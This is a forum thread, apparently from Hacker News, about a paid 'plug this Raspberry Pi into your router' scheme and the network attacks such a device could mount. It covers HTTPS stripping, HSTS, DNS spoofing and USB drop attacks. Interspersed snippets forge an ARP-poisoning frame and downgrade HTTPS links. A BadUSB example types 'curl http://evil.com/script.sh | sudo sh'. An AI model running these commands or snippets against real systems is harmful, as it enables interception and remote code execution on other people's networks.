One comment in that thread[1] gives a full explanation of what such a Raspberry Pi device hooked up to the router can do: forward all the network traffic, replace the router's stock firmware with its own, install software on network-connected devices via known vulnerabilities, and spoof websites by acting as a custom DNS server. In my opinion, it looks like "a Pi-hole[2], but for phishing".
I still don't understand how this device could steal login details. Everything should be encrypted and authenticated through PKI when using any website that accepts login details. Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.
>Everything should be encrypted and authenticated through PKI when using any website that accepts login details.
Yes, everything SHOULD be like this. I should be able to trust my neighbors and leave my doors unlocked as well, and I should be able to have faith in my elected officials. And yet...
The other issue is that you can connect to a website that implements HTTPS correctly and still be borked if that site doesn't implement HSTS properly - there are tools on Kali that implement HTTPS downgrading.
>I still don't understand how this device could steal login details...Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.
The problem comes when your corrupted router messes with DNS and sends you to https://evil.chase.com, which has a pixel perfect mock up of a chase bank login screen, and a perfectly valid cert.
That's not a downgrade, but a lack of upgrade. A few comments back said https://evil but it would have to instead be http://evil assuming no rogue root cert is installed.
And requires that if the user had visited chase.com, that chase.com not have includeSubdomains in their HSTS header.
So to prevent a downgrade attack before a first connection is made, not only does the domain need to "includeSubdomains" - and have a valid lifetime (maybe of at least 31536000 seconds, or 1 year [this may just be a government standard]), but they'd also have to send the preload directive in their HSTS header and have been preloaded by that browser platform. If the domain is not preloaded, that first connection is required to get the HSTS information to the client in the Strict-Transport-Security header.
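The three conditions above (sufficient max-age, includeSubdomains, preload) all live in one header. A minimal sketch of checking them - the parser and the example header values are illustrative, not from any real site:

```python
# Sketch: check whether a Strict-Transport-Security header value meets the
# usual preload requirements (max-age >= 1 year, includeSubDomains, preload).

def parse_hsts(header: str) -> dict:
    """Split an HSTS header value into its directives."""
    directives = {}
    for part in header.split(";"):
        part = part.strip().lower()
        if not part:
            continue
        if "=" in part:
            name, _, value = part.partition("=")
            directives[name.strip()] = value.strip().strip('"')
        else:
            directives[part] = True  # valueless directive, e.g. "preload"
    return directives

def preload_eligible(header: str) -> bool:
    d = parse_hsts(header)
    max_age = int(d.get("max-age", 0))
    return (max_age >= 31536000                      # at least one year
            and d.get("includesubdomains") is True
            and d.get("preload") is True)

print(preload_eligible("max-age=63072000; includeSubDomains; preload"))  # True
print(preload_eligible("max-age=86400"))                                 # False
```

Even a header that passes this check only helps once the browser has actually seen it (or has the domain baked into its preload list).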
Perfectly valid cert for the evil.com domain - someone below pointed out that I flipped the domain names.
In reality the "evil" page would look something like "https://www.login.chase/login?id=DEADBEEF/.evil.com". For a non-trivial number of users, that's enough - "I see the nice green lock, I see chase, and some crazy web address characters that are always there".
Unless you're doing something super clever with characters that I'm not understanding, that's not how URLs work. ".evil.com" is clearly part of the query parameter.
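For what it's worth, the standard library agrees; parsing the (fabricated) URL from the comment above shows exactly where the hostname ends:

```python
from urllib.parse import urlsplit

# The URL from the comment above -- a fabricated example, not a real site.
url = "https://www.login.chase/login?id=DEADBEEF/.evil.com"
parts = urlsplit(url)

print(parts.hostname)  # www.login.chase -- the only part that matters for TLS
print(parts.path)      # /login
print(parts.query)     # id=DEADBEEF/.evil.com -- ".evil.com" is just query data
```

The certificate is validated against `parts.hostname` only; nothing after the `?` plays any role.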
Assuming they're not doing anything weird with Unicode, the evil pi is probably running its own DNS server, intercepting the traffic intended for normal DNS, and basically creating its own TLD the same way you would normally do localdomain. The evil.com part is redundant.
For example, you go to http://website.com. Normally the site's home page has an HTTPS redirect. Your router replaces that page and disables the redirect. Now it's up to you to notice you're on an HTTP connection.
If you think this is rare: some Fortune 500 FX and stock trading sites had this vulnerability as of a year ago (I haven't checked again).
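The redirect-stripping attack described above (in the style of tools like sslstrip) boils down to rewriting responses in flight: the MITM talks HTTPS to the real site but serves the victim plain HTTP. A toy illustration of the rewriting step only:

```python
# Toy illustration of HTTPS-stripping: the proxy downgrades every https://
# link in a page so the victim's browser keeps making plain-HTTP requests,
# which the proxy can then read and modify. Purely a sketch of the idea.

def strip_https(html: str) -> str:
    """Downgrade every https:// link in a page to http://."""
    return html.replace("https://", "http://")

page = '<a href="https://example.com/login">Log in</a>'
print(strip_https(page))
# <a href="http://example.com/login">Log in</a>
```

A real tool also has to keep a map of which URLs it downgraded, strip HSTS headers, and handle cookies, but the core trick really is this simple.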
Correct. HSTS does not protect against a first visit to a site. And to work around HSTS, there are many ways to get users to clear their caches, install new browsers, or use new devices to browse sites they've already visited.
Technically, if the domain had DNSSEC enabled, it might prevent this kind of attack, but no regular consumer is using a validating stub resolver, so even DNSSEC wouldn't work.
Now that browsers are saying "Not Secure" by default for HTTP pages, users are apparently expected to notice this popping up where it didn't before and realizing they're on a phishing site.
Anyone can preload their domain in Chrome, Firefox and others that share the preload list. I'm not sure what vulnerabilities are left after your site has been preloaded.
No. If the domain (and its subdomains) are preloaded - then a first visit is not required. The HSTS requirement is then baked into a list supported by modern browsers such as Firefox and Chrome.
HSTS and Certificate Transparency, yes. Certificate Pinning is too easy to shoot yourself in the foot with, so it should only be considered for the most sensitive sites.
Dynamic pinning (HPKP header) is being rolled back from browsers because of the reasons you mention. Only a small set of static pins will remain (in Chrome, Google sites for example).
Are Windows 0-days really that common? I thought they were usually saved for really serious attacks, e.g. from state-sponsored actors, not scams on the level of "pay some random person $15 a month to attach a mysterious device to their router".
Not only that, but because the device has unfettered access to the internet, an attacker can always update it with new ways of installing certificates on your machine.
any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.
If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.
DNS can be mutated.
Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.
...
Hundreds (if not thousands) of repeatable attack vectors given physical access to the network like this.
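The auto-update vector in that list is worth spelling out: an updater that at least verifies the deliverable against a hash obtained over an authenticated channel defeats in-flight tampering. A minimal sketch (the payload and hash below are made up for illustration):

```python
import hashlib

# Sketch: verify a downloaded update against a SHA-256 published out-of-band
# (e.g. fetched over a separately authenticated HTTPS channel, or signed).
# An updater that skips this and trusts plain HTTP is trivially MITM-able.

def verify_update(data: bytes, expected_sha256: str) -> bool:
    return hashlib.sha256(data).hexdigest() == expected_sha256

payload = b"update-v2.bin contents"
published_hash = hashlib.sha256(payload).hexdigest()

print(verify_update(payload, published_hash))                # True: intact
print(verify_update(payload + b"injected", published_hash))  # False: tampered
```

Hash pinning alone still leaves key distribution to solve (how do you trust the hash?), which is why real updaters layer code signing on top.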
> any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.
Which is why everyone is moving to HTTPS.
> If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.
If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.
> DNS can be mutated.
Which won't allow you to MITM HTTPS sites.
> Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.
Any auto update software which doesn't verify certificates has a major security vulnerability.
>HTTPS protects against all of these:
>Which is why everyone is moving to HTTPS.
Yes, but a MITM can block or hamper the conversion to HTTPS and mutate the content. HPKP and HSTS are not widely used yet (and even where they are, the first request can be bypassed given this topology). Given current "end user" level protections, having a device such as this on your network basically ensures you can be hijacked if even one request is made over HTTP or to a site not currently pinned to HTTPS.
>If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.
FFS, the point is the MITM gives a huge amount of attack surface to breach the client -- which yes, after that is done you lose all bets. Everything from injecting code into zips/executables downloaded over HTTP to using 0day browser exploits and mutating requests. The device itself is physical access to your network, which makes access to the clients 1000x (if not more) easier.
> DNS can be mutated.
There are other protocols besides HTTPS.
>Any auto update software which doesn't verify certificates has a major security vulnerability.
Granted, yes. That does not make it rare or unusual - look at the CVEs. There are many developers writing (or enabling) auto-updaters who, given their understanding of security, should not be responsible for that.
It's amazing how many people forget that Raspbian is still Linux under all the Wolfram and Raspberry Pi stuff. So you essentially have a tiny computer that can be plugged into almost anything you can program for.
It depends on what you're using it for. I bought a kit for setting up a RetroPie because I didn't feel like checking to ensure the parts were all compatible. It gives you step-by-step instructions to set it up, and none of it requires knowing anything about Linux. You just download an image file, write it to the SD card, and when you plug it in it does all the setup itself and presents you with the RetroPie GUI. The only hint that it's Linux under the hood is when the names of processes scroll past on the screen as it boots.
If they picked it out and bought it, yes, obviously.
However, there are a lot of products sold that perform selected tasks that run on preconfigured raspis with the consumer none the wiser. Kodi boxes, emulation kits, scientific plug-and-go kits, and much more.
I have been offered or asked about things running on raspi hardware on many occasions by people who were none the wiser to what platform they were using, and we recently had an event where we gave out around a hundred of them preloaded with run-once synchronized software for an event. How many of those people knew for certain they were holding Raspberry Pi Zero W boards with pared down Linux kernels? None.
They're a lot more commercial and common than a handful of snarks with downvotes realize, and OP doesn't deserve to be punished for that.
Keep in mind that all modern routers are also tiny computers running a Unix variant like busybox. They can run arbitrary programs and they’re connected to everything you have by default.
Is a disk image of one of these available anywhere?
I find it much more likely that these are being used for what they say they are (basically a proxy so they can buy ads from a residential IP) than some crazy MITM device. The "Attacker" is basically renting an IP connection or paying a co-location fee for their little server.
Plugging a device into your network doesn't make it magically see all the traffic. It would have to be doing ARP spoofing, DHCP hijacking, or hacking the router config/firmware. Is it possible that it is doing some or all of those things -- sure. But why? That could all be done via a malicious client executable that would give you access to the network and much more, and is much more discreet than a physical box, so why would someone go through the trouble of shipping out a box and paying the recipient? The simpler explanation is that the sender of the device is doing nefarious things on the internet and needs a bunch of IPs for cheap, so when they get blocked they can just move on to the next IP.
Would I put one of these on my home network - hell no. But if one of my friends tells me they had one plugged into their network I wouldn't immediately assume that their entire digital life was compromised. I would tell them to unplug it though.
Well, if they are willing to break ToS to sell ads on Facebook, how much further do you need to go to rationalize auth capture, rootkit injection, or any other malicious activity?
"Plugging in the device on your network doesn't make it magically see all of the traffic" ... Assuming it has not been constructed to do all of the things you list (or more) does not magically make it not see all of your traffic either. There is no magic involved, it is either constructed to capture/inject or not -- the only way to know is to review the actual bits and firmware.
Unless you work in a SCIF (and probably not even then) your local network should not be considered trustworthy. Assume that hostile activity is always present. Especially if you have "appliance" type stuff on your LAN, such as ISP-provided routers, Amazon/Google devices, smart light bulbs, etc. Keep your machines and firewalls updated.
Unless OP is someone very special, all their private data isn't worth 15 dollars a month.
I suspect this device is far more likely a broadband speed testing agency trying to get speed test results from different consumer ISP's, taking WiFi and the customers device out of the picture.
I disagree; the plug-in-this-Raspberry-Pi scam is unfortunately not uncommon, and not at all related to broadband testing AFAIK. A company called rentyouraccount.com runs a similar scam, and their service explains what the Pi is doing:
>Facebook has several mechanisms in place to protect your account. We make every attempt to work within these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.
Yes. You're right. These things don't care about local traffic. SSL would ruin its day if that were the case.
This is meant to be one agent in a network of these things. I'm not sure what the total point really is, but I can pretty much guarantee it couldn't care less about the local traffic.
For wired Ethernet it depends on whether the traffic even reaches that port or not. Old dumb Ethernet hubs used to pass all traffic to all ports, but modern switches only send traffic to the intended destination.
It will show you everything coming out of your switch port, but only traffic to/from the connected device will come out of that port.
You have to use ARP poisoning or some other trick to get other network devices to send ethernet frames to your mac address in order for the switch to forward them out your port.
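For the curious, an ARP reply is only 28 bytes on top of the 14-byte Ethernet header, which is part of why poisoning is so easy. Building one (all addresses made up; actually sending it needs a raw socket and root, which is omitted):

```python
import struct, socket

# Sketch: forge an unsolicited ARP reply claiming the gateway's IP maps to
# the attacker's MAC. Once the victim caches this, its traffic for the
# gateway is delivered to the attacker's switch port instead.

attacker_mac = bytes.fromhex("de:ad:be:ef:00:01".replace(":", ""))
victim_mac   = bytes.fromhex("aa:bb:cc:dd:ee:ff".replace(":", ""))
gateway_ip   = socket.inet_aton("192.168.1.1")
victim_ip    = socket.inet_aton("192.168.1.50")

# Ethernet header: dst MAC, src MAC, EtherType 0x0806 (ARP).
eth_header = victim_mac + attacker_mac + struct.pack("!H", 0x0806)

# ARP body: hw type 1 (Ethernet), proto 0x0800 (IPv4), lengths 6/4, opcode 2 (reply).
arp_reply = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
arp_reply += attacker_mac + gateway_ip   # sender: attacker's MAC, gateway's IP
arp_reply += victim_mac + victim_ip      # target: the victim

frame = eth_header + arp_reply
print(len(frame))  # 42 bytes -- a complete ARP-poisoning frame
```

Forty-two unauthenticated bytes are enough to redirect a host's traffic, which is why ARP is hopeless as a trust boundary.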
If someone would ship this to our office with a note like "attach this to a LAN port" chances are it will get attached. And we're a software house. People tend to pay attention to viruses, etc.. but not physical security.
At a previous employer (Fortune 500, not a software co.) the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network. IIRC there was a depressingly high (> 50%) rate of them being plugged in.
> the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network.
Which is clever, but given the current level of small scale integration you could just as easily hide the same exploits inside of a charging cable, a USB fan, or really any other small-form factor USB-pluggable gadget. The problem isn't them discriminating between "hacked" and "non-hacked" devices -- it's them plugging _anything_ non work related or issued into their USB ports.
Anecdotally, I heard of a toy radio control quadcopter belonging to western military personnel in Afghanistan that turned out to be trying to phone home to ${badguy} when they plugged it into a laptop to charge. This stuff is everywhere, and has been for years.
Product idea: internal condoms for every USB port on a business computer. Let employees charge their phones in USB ports or plug whatever in, data wires never connect - problem solved: Employees can charge their ${device} without risking security compromise of the host workstation.
How is that better than epoxy squirted into all unused ports of your existing computers while also distributing fast charging USB wall warts across the office like confetti? Even the good ones are relatively cheap, especially if bought in bulk. Relative to the cost of a desktop computer they're practically free.
(I'm genuinely surprised that the standard DELL and HP corporate workstation doesn't have its front USB ports deleted and its rear port access covered by a lockable metal cowl.)
I noticed that with my mobile WiFi (Huawei), which I generally leave plugged in: when my friend plugged her Windows 10 tablet into the same power outlet (2 sockets), it suddenly detected a new USB device. I don't ever plug anything in there except the charger for my bike light, so I had never noticed; I don't know if it has an autorun to install drivers, as they often do. Obviously the data wires are joined there.
At least on Dell, USB ports can be disabled in the BIOS (with separate options for front and rear ports). Disclaimer: I haven't tried to do it so I don't know if it actually works.
Caveat: you'll need to hire a lot more IT people because everyone in the company will be lined up out the door with complaints. "This computer doesn't work with my keyboard, I need a new one." "My mouse isn't working." "This computer won't read my flash drive and I have to get this file to accounting by 10:00!" "This computer isn't working with my pen tablet and the deadline for getting these graphics done is tomorrow!"
So you'll have to replace all of your intentionally-broken computers with good ones, which will cost a fortune on top of all the employees' lost work time and no one will want to buy the broken computers from you so you'll have to pay to have them scrapped.
You still need to hook up stuff to a computer - mice, keyboards, those weird 3D-mice our CAD people use, printers, and these days even displays are all attached to USB ports. And since the ports USB replaces have mostly gone, there is little alternative left.
At work, we keep a couple of power-socket-to-USB chargers around, if people want to charge their smartphone they can grab one. But simply disabling the USB ports on our users machines is not a realistic option at this point.
No, shorting the data pins signals "this is a charger, you can charge as fast as you want, until it's so much current that the voltage starts to drop too much".
So these IT geniuses at a Fortune 500 company were clever enough to test their employees' computer security acumen (and get the predicted result), but they weren't clever enough to simply block all use of USB mass storage devices in their corporate operating system distribution?
Surely by now all corporate desktops should be configured to not respond to any USB devices other than the generic HID for mouse and keyboard, plus a whitelist of approved devices (e.g. fingerprint readers, Yubikeys). Inserting a USB mass storage device into a corporate workstation should result in nothing. Plug-and-play shouldn't be triggered. The mass storage driver should not load.
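The mass-storage part, at least, is a long-standing Windows configuration knob: setting the USBSTOR service's start type to 4 ("disabled") prevents the mass-storage driver from loading at all. Illustrative fragment; test before deploying fleet-wide:

```
Windows Registry Editor Version 5.00

; Disable the USB mass-storage driver so inserted flash drives never mount.
; Start = 3 (manual, the default) -> 4 (disabled).
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR]
"Start"=dword:00000004
```

This only blocks the storage class; keyboards, mice, and other HID devices continue to work, which (as noted downthread) is its own attack surface.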
The computer security industry for SMBs is like 95% theater and 5% actual practice.
Conducting that test produced something tangible for whoever made the purchasing decision: It clearly illustrated a need for the services rendered, did it in a way that offered job security to management by giving them license to assert the position over their subordinates, and established a metric by which to evaluate the security company's performance which can be easily, repeatably, and predictably improved over time.
It also checked a lot of boxes that will be useful in court if they ever need to prove that they weren't negligent on privacy and security, which is a form of insurance that has real measurable value when it comes to legal claims.
> The computer security industry for SMBs is like 95% theater and 5% actual practice.
I'd say it's 40% paranoid arse-covering by IT department heads, 35% whatever middle management incorrectly assumes to be current best practices, 20% ego-stroking by the CIO, and 5% sensible context-driven decision-making by IT front-line staff.
Those numbers sound a little thin on the bottom, but only a little. Maybe take 15% out of the CIO category and just throw it away, because they're usually very quick to turn on their underlings.
Trouble is that the same corporation has the following additional policies:
* A ban on mail attachments of certain types (excel, zip files...)
* mailbox limits from the 1990’s (100MB or so)
* a ban on Dropbox, Gdrive or any other file sharing service
* No public facing sftp or similar
* A web site so mired in red tape that it takes 6 months and a dozen approvals to get anything uploaded.
Often the USB drive or something similar is the only way for employees to actually do their jobs.
It seems the problem is bad corporate file sharing policies that are incorrectly validated as successful because the employees are using workarounds rather than pointing out its inadequacies.
One of many depressingly common pathologies in large organizations. The best way to ensure your infrastructure won't break is to ensure it's not used; whether or not that means people can do their job is a concern for a different department.
I have seen this kind of situation, too. It sucks, but if you play by the corporate rulebook and lobby for better rules, you will be either worn out or retired by the time those rules get updated.
In these situations the organization really should get box.com subscription (or Dropbox enterprise) and have file sharing with control, auditing and org policies.
Don't believe generic HID is safe either. You could make a device that pretends it's a keyboard and automatically types Win+R, then "curl http://evil.com/script.sh | sudo sh", a short sleep, then Alt+Y.
Sorry for mixing Windows and Linux, but conceptually something like this should work on Windows if you don't require a password in your UAC prompts.
I wonder if a big (Fortune 500) company could get HID devices customised so that only company-owned devices could be plugged in. It shouldn't be that hard to design such a device: it would show up as a custom device, the installed driver would poke it in a crypto-shielded way, and only then would it provide the keyboard/mouse inputs. It can't simply detach and reattach as a standard HID, because otherwise any HID would work.
Hm, perhaps.. is anything like that available already?
I don't think I've ever heard of a company that actually does this in practice. I suspect it ends up being more trouble than it's worth. I know at that company the list of approved devices would probably end up being dozens of pages long... and yeah, thumb drives and USB hard drives were used a decent amount, especially outside of IT.
Maybe someone needs to invent a USB-based thumb drive reader that only allows generic mass storage devices to be attached but does not work as a hub, rather as a proxy device.
Bonus points: don't mount the drive directly, instead connect it to a centralised server on the corporate network that scans for threats and mounts a sanitised version of the drive's contents as a network share.
Triple word score: audit everything contained on every drive and everything that is copied on and off.
Sell that for $200 per unit to Fortune 500 companies and paranoid government agencies worldwide... and you'll retire early.
Your triple word score is already handled by a dozen different companies doing endpoint security from advanced heuristics at the kernel level like Crowdstrike, or just filenames and hashes like Code42.
A consumer (i.e. workplace for people who don't know better) NAS is usually Linux with a few hard drives attached via a cheerful and brightly coloured web UI - occasionally useful, some way short of secure.
I expect someone sells hardened ultra-secure corporate NAS boxes, but I've never seen any in the wild.
The trouble is, the sort of people who would buy a pre-hardened NAS are also the sort of people who would be suspicious of a pre-built unit. I know for sure I wouldn't trust anything off the shelf, I'd take the base OS and build something around it.
Work at a fortune 500 company, we're currently eliminating USB ports for data devices - but leaving them open for other devices that do not identify as media.
We are dragging people to a corporate cloud solution; however, we are finding that the drive to cloud has severely underestimated the volume of data that people will sync across the network, and how much work is done outside official corporate systems, in Excel instead.
This is having two effects: our network capacity is being drained, and users are reporting performance issues due to latency in poorly developed Excel applications.
It's a pentesting technique, used to assess the level of effectiveness of user training.
While your final comment is accurate, it is impractical as usb mass storage is still required in many places. Also, you can't effectively block HID, and an attacker can use HID disguised as or in a thumb drive to successfully attack a network.
I’m not sure I understand what the big deal is unless your machine tries to run software automatically from devices that are plugged into it. If you plug something into a centOS machine it’s not going to be able to do anything until you mount it and even then why would code be able to run from it?
Well for starters, if you’re curiously plugging it in, you’re going to mount it aren’t you?
Second, it can emulate an HID keyboard device and type keystrokes faster than you can react and pull it out, at which point it’s far too late - it’s pulled a secondary payload down or mounted a USB mass storage device and you’re owned.
You got me with the emulate-a-keyboard thing. Now I'm thinking you shouldn't plug in strange keyboards or mice either, because they could have an onboard payload. The crash cart at a data center is kind of a dumb idea in a way, except the place is usually full of cameras.
You know those little desk fans that come with a USB plug now, and also an adapter for the electrical outlet? I never plug those into my laptops - who knows if there's a payload on them.
I will say this. I currently work, and have worked at, a few secret and top secret facilities - and the number of people I see plugging those (and similar) devices into their laptops is scary.
> the number of people I see plugging those (and similar) devices into their laptops is scary.
If such a device is able to cause a compromise / incident in a secure facility, well, several different "failures" at several different levels have occurred in order for it to get to that point.
Yeah, it irks me that this is seen as a "stupid users" problem when our OSes are programmed to automatically execute code on a USB stick. I don't think the users are the stupid ones in this scenario.
> If you plug something into a centOS machine it’s not going to be able to do anything until you mount it ...
You may want to double check your CentOS desktop's defaults (you might be surprised).
My most critical machines have a file named /etc/modprobe.d/disabled.conf with entries such as these for dozens of filesystems, network protocols, and such:
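(The entries follow the standard modprobe disable pattern; the list below is illustrative, not my actual file:)

```
# /etc/modprobe.d/disabled.conf -- illustrative entries
# "install <module> /bin/false" makes any attempt to load the module fail,
# which is stronger than "blacklist" (blacklist only stops auto-loading).
install usb-storage /bin/false
install cramfs /bin/false
install dccp /bin/false
install sctp /bin/false
```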
When absolutely required, they can quickly be temporarily commented out (but not by mistake) and there's some very extensive auditing rules that keep an eye on things at that point.
It's really not that hard to lock a machine down and yet still have it actually remain usable. With the exceptions of the few security-focused distributions (Qubes OS, Tails, etc.), I can't think of any Linux distribution / desktop environment that even comes remotely close to doing anything like that (OOTB) by default, though.
A lot of IT security teams do this. On one side it is depressing, but on another side it is annoying to have to hear them talk about it every staff meeting. All companies seem to have people with zero understanding of computers and will fall for anything. I wonder how effective the education is. I guess if it prevents one attack it can pay for itself.
Only a little bit. Most IT CyberSecurity teams can use bad stats to justify their value and additional staff, so they want to bring it up at every opportunity.
I don't necessarily disagree, but power users often get frustrated by red tape applied to everyone and not just those who consistently misuse their computer privileges.
I was at a financial software firm that dealt with USB security issues by filling the USB sockets with epoxy. The keyboard and mouse could not be removed from their USB sockets as they were held in place with a metal collar bolted to the case.
Simple and effective, although it destroyed any resale value of the PCs.
In my company (Fortune 500), we get new notebooks every 3 years and IT persistently pesters owners of old notebooks to return them. Given the sheer number of devices, I can imagine a reselling contract to be a nice additional source of income.
In this company's case the PCs were the cheapest of the cheap. Bottom end Dell and HP stuff.
When they were life-expired they were handed over to a recycling company, which I assume would take the time to pick the epoxy out of the USB sockets, or probably just replace them. I think buying new USB sockets and ribbon connectors for the motherboards is probably quite cheap these days.
In the US, above a certain size you're basically required to sell off the old hardware because throwing it away counts as polluting, and the people who dispose of exclusively tech stuff charge you for that service.
Yep, look on eBay for sellers that specialize in refurbishing them. It's a great way to get something like an older Thinkpad for really cheap. Perfect for a Linux laptop that doesn't need the latest and greatest.
Never underestimate the distribution of stupid. I worked at a hardware/software company where management distributed USB drives as a reward for something or other. The USB drives weren't even in blister packs; they were just loose in plastic envelopes. I threw mine out and wrote a complaint.
Especially when stupid is an observable attribute in the industry.
Time and time again the technology industry has failed to consider security as a serious issue, never mind develop systems that are robust and transparent.
We don't have botnets, booby-trapped mail attachments, script-hackable servers, USB drives that can carry a viral payload, and all the rest because users are stupid; we have them because the industry's default culture is to think of security as an esoteric side issue, not a non-negotiable critical feature in all IT systems.
More specifically, they tend to view it as a cost center that does nothing to increase profits.
Thing #1 to remember if you're in infosec is that you must pitch it based on the money saved by not having expensive problems like having to hire outside consultants and auditors after a breach.
No, iirc stuxnet spread itself without anyone physically leaving a USB stick anywhere. On a system infected via the network, it would try to infect any USB drives connected to the system.
Stuxnet is fascinating. Still, as far as I can tell, the most complex, interesting malware ever found in the wild. I believe it's unclear how stuxnet found its way into the enrichment facilities.
It did contain a USB device exploit delivering a dropper with a completely separate payload specifically targeted at the Natanz facility. A compromised USB device picked up in the parking lot would do the trick, but there are certainly other ways to get something through the front door and that information is unlikely to be public knowledge any time soon.
I do remember reading about that. It exploited a bug in windows to load an executable when the usb was plugged in. It then installed a usermode rootkit and hid its files.
It probably got in via usb in the parking lot, but there hasn't been an official statement that I know of. It was confirmed that the hack into the DHS intranet was done by USB stick in the parking lot.
Natanz was air-gapped. Stuxnet penetrated the facility on a physical device; once inside, it spread over the LAN. The widespread distribution of it on the open Internet was because of a bug in the code.
> The Widespread distribution of it on the open Internet was because of a bug in the code.
It's presumed that the Israelis got a little greedy and, even though it was doing its job, tried to make the virus do its job a little better. They made it more virulent, which made it spread outside the systems it was targeted at.
My understanding is that stuxnet got out of Natanz, by mistake. The world was never supposed to see that code. It was planted inside the Natanz secure perimeter.
Well, certain versions of stuxnet were sent to Natanz suppliers first, and I believe the infection made it out into the world from one of these suppliers, not Natanz itself.
This is why, as much as I hate it most of the time, it's a good idea not to give your devs access to your network setup. If you're a small shop, limit the access as much as reasonably possible.
Emphasis on reasonable. If you limit workers' access too much for them to do their jobs they will find creative workarounds. Some of those can be more dangerous than just giving them the access that they need in a way that you control. Examples being if you make it so that the only way developers can debug a system is by adding in backdoors, or if you lock down the network so much that they need to use an unsecured public network to do their work. I've seen those things happen. Developers and IT need to work together, not be adversaries.
In the days when USB sticks were more common it was an easy tactic for someone to drop one in a company parking lot labeled “salary data” and with almost certainty that thing would get plugged into a device on the corporate network. The biggest security vulnerability in most cases is still users doing dumb things.
That's weird, given how USB devices are also often banned so people resort to using online services. I implore people to prefer Airdrop, as it's an encrypted peer-to-peer system. Slack is the easy option, but it's a US based corporation. If you'd pass customer data through Slack you'd already be in violation of local laws.
I don't see how this 'man' in the middle could actually intercept passwords, except for http, but who runs auth over http anyway. For https, the 'man' would have to substitute its own certificate and then the browser / client software wouldn't trust the cert/domain combination without the end user being extremely stupid (and knowledgeable enough to achieve the stupidity).
It could use something like bdfproxy[1] to intercept HTTP-downloaded EXE files, then add some persistent malware in _addition_ to whatever the EXE was doing. This has been done before, over Tor[2].
The malware doesn't have to add a new root certificate, either, though that's completely possible. The Zeus trojan [3] does "man-in-the-browser" to intercept banking information, for example.
So the spoofer distributing these devices is going to all this trouble/expense/risk in the hope that there's an HTTP-downloaded EXE it can corrupt, then hopes the hash check doesn't fail on that corrupted EXE, and hopes the user ignores the untrusted-source warning, so that it can install a trojan?
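The hash check alluded to above is the user's main defense against a tampered download. A minimal sketch of that check — verifying a file against a vendor-published SHA-256 digest; the function names here are mine, not from any tool mentioned in the thread:

```python
import hashlib

def sha256_of(path, chunk_size=1 << 16):
    """Return the hex SHA-256 digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_download(path, published_digest):
    """Compare a downloaded file against the vendor's published digest."""
    return sha256_of(path) == published_digest.lower().strip()
```

Of course this only helps if the published digest was fetched over a channel the MITM doesn't control — a digest served from the same HTTP page as the EXE can be rewritten right along with it.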
I think what he means is that it seems like a lot of trouble to hack someone who is not necessarily hackworthy? Like what kind of things would you expect to gain from someone who would be as computer illiterate as to allow all that to come to fruition?
I work at a software company. You would be amazed how many manager types, earning 6 figures, are absolutely naive with regards to security. Those are prime targets for this kind of exploit.
These are the same users who connected an untrusted block of hardware directly to their router and presumably gave them their Facebook login and password.
SSL stripping perhaps? There are still plenty of sites that don't implement HSTS, and not all users are vigilant enough to notice when the site they're visiting suddenly doesn't have HTTPS anymore.
Web security has been improving a lot in recent years, but it's not yet at the point where a man in the middle isn't a relevant threat.
You type in http://yourbank.com, your bank responds with a 301 to https, but this helpful router instead takes you to its phishing site. Lots of people wouldn't notice.
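The core rewrite behind this "sslstrip"-style downgrade is tiny. A toy sketch (the function name and header shape are mine): the man in the middle sits on the plain-HTTP leg, catches the bank's redirect, and flips the Location header back to http so the victim's browser never upgrades.

```python
def strip_redirect(headers):
    """Rewrite an HTTP->HTTPS redirect's Location header back to http.
    This is the essential trick of an SSL-stripping proxy: the MITM
    speaks HTTPS to the real site and plain HTTP to the victim."""
    out = dict(headers)
    loc = out.get("Location", "")
    if loc.startswith("https://"):
        out["Location"] = "http://" + loc[len("https://"):]
    return out
```

HSTS exists precisely to close this window: a browser that has already seen the site's Strict-Transport-Security header refuses to follow the stripped redirect.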
CA's are fully automated, they won't review or check for phishing lookalikes. Maybe reactively if it's being reported, but, should they operate as the internet police? What if it's a legitimate bank that has the same name (with an accent) and isn't beholden to the same trademark in their country?
+ It may seem like it is if your organisation gets a bunch of EV certs with the same organisation info under some bulk deal. The issuer only does the expensive manual EV steps once per period, if you're Google in January then (the thinking goes) you are still Google in June. This saves them money so it enables them to offer pretty good deals for lots of EV certs.
+ Good EV providers streamline the manual stuff in countries like the US that have their government records online. A call centre employee can do the searches, pull up contact details and phone your Head Office or whoever to confirm in minutes not hours. However this also means they won't necessarily pick up on subtle clues like why is this outfit named Myba N K ? Oh! That's My Bank but with misleading capitalisation and spacing.
+ White hats toying with EV discovered that outfits like D&B relied on in the business community to verify identity are... Not very reliable. If D&B says the Head Office is at 632 Wall Street that might be because somebody filled out a web form, not because D&B agents even checked 632 Wall Street exists let alone that the company has offices there...
The spoofer can obtain a valid certificate for another, seemingly legitimate site. Any software that hasn't explicitly pinned the leaf TLS certificates will still accept the (valid) certificate it is redirected to.
And sadly, a lot of software still doesn't perform certificate pinning.
This will seem like a valid website, especially if the phishing site is done well. Not just non-technical users, I'd wager some tech familiar users would be fooled too.
The focus always being on the lock icon might not always cover it.
